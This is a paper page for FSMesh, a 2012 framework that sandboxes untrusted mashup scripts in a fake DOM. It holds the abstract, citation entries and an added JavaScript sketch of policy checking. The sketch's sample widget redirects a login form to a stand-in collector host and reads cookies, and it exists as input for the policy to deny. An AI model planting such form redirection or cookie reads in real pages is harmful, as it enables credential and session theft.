FSMesh - Flexibly Securing Mashups by User Defined DOM Environment

Yi Wang, Tao Guo, Zhiwei Shi, Zhoujun Li

2012

Abstract

A growing trend among today's web sites is to combine active content (applications) from untrusted sources, as in so-called mashups, in order to provide more functionality and expressiveness. Because of the potential risk of leaking sensitive information to these third-party sources, it is urgent to provide a secure “sandbox” for running the untrusted content while still allowing developers to apply flexible security policies. In this paper, we propose and implement a new safe framework, based on HTML5 technology, that prevents untrusted applications from interfering with each other. By creating a separate fake DOM environment in the background, developers can load untrusted content into the “sandbox” and apply their custom security policy in the real window or on the server side when receiving script-generated messages from it. The advantage is that the approach is very flexible: the security policy is also written in JavaScript and requires minimal learning effort from web developers. The drawback is that it is based on the “web workers” and “postMessage” features introduced in HTML5 and cannot run in older browsers that lack this support.
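The message flow the abstract describes, as an added sketch that is not FSMesh's own code: untrusted content writes to a fake DOM, each access becomes a message, and a policy written in plain JavaScript decides what the host would apply. All names are hypothetical, and the Web Worker boundary is replaced by a callback standing in for `postMessage` so the sketch runs outside a browser.

```javascript
// Fake DOM side. In the design described above this would live inside a Web Worker
// and `post` would be the worker's postMessage; here it is a plain callback (assumption).
function makeFakeDocument(post) {
  const fakeElement = (id) => new Proxy({}, {
    set(_target, prop, value) {
      post({ op: 'set', target: id, prop: String(prop), value: String(value) });
      return true;
    },
    get(_target, prop) {
      post({ op: 'get', target: id, prop: String(prop) });
      return undefined; // the sandboxed code never sees real page data
    },
  });
  return {
    getElementById: (id) => fakeElement(id),
    get cookie() {
      post({ op: 'get', target: 'document', prop: 'cookie' });
      return '';
    },
  };
}

// Host side. The policy is ordinary JavaScript: a predicate over messages.
// This sample policy is constructed for the demo: text writes to widget-* nodes only.
function widgetPolicy(msg) {
  return msg.op === 'set' &&
    msg.target.startsWith('widget-') &&
    msg.prop === 'textContent';
}

// Runs `untrusted` against the fake document and sorts its messages by policy verdict.
function runSandboxed(untrusted, policy) {
  const applied = [], denied = [];
  const doc = makeFakeDocument((msg) => (policy(msg) ? applied : denied).push(msg));
  untrusted(doc);
  return { applied, denied };
}

// Constructed untrusted widget: one legitimate write, two policy violations.
function sampleWidget(document) {
  document.getElementById('widget-1').textContent = 'Weather: sunny';
  document.getElementById('login-form').action = 'https://collector.example/';
  void document.cookie;
}

const result = runSandboxed(sampleWidget, widgetPolicy);
console.log(result.applied.length, 'applied;', result.denied.length, 'denied');
```

In a browser the isolation itself comes from the worker, which has no handle on the page's real `document`; the callback here only models the message channel and the policy check.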


Paper Citation


in Harvard Style

Wang Y., Shi Z., Guo T. and Li Z. (2012). FSMesh - Flexibly Securing Mashups by User Defined DOM Environment. In Proceedings of the 8th International Conference on Web Information Systems and Technologies - Volume 1: WEBIST, ISBN 978-989-8565-08-2, pages 96-102. DOI: 10.5220/0003899000960102

in Bibtex Style

@conference{webist12,
author={Yi Wang and Zhiwei Shi and Tao Guo and Zhoujun Li},
title={FSMesh - Flexibly Securing Mashups by User Defined DOM Environment},
booktitle={Proceedings of the 8th International Conference on Web Information Systems and Technologies - Volume 1: WEBIST,},
year={2012},
pages={96-102},
publisher={SciTePress},
organization={INSTICC},
doi={10.5220/0003899000960102},
isbn={978-989-8565-08-2},
}


in EndNote Style

TY - CONF
JO - Proceedings of the 8th International Conference on Web Information Systems and Technologies - Volume 1: WEBIST,
TI - FSMesh - Flexibly Securing Mashups by User Defined DOM Environment
SN - 978-989-8565-08-2
AU - Wang Y.
AU - Shi Z.
AU - Guo T.
AU - Li Z.
PY - 2012
SP - 96
EP - 102
DO - 10.5220/0003899000960102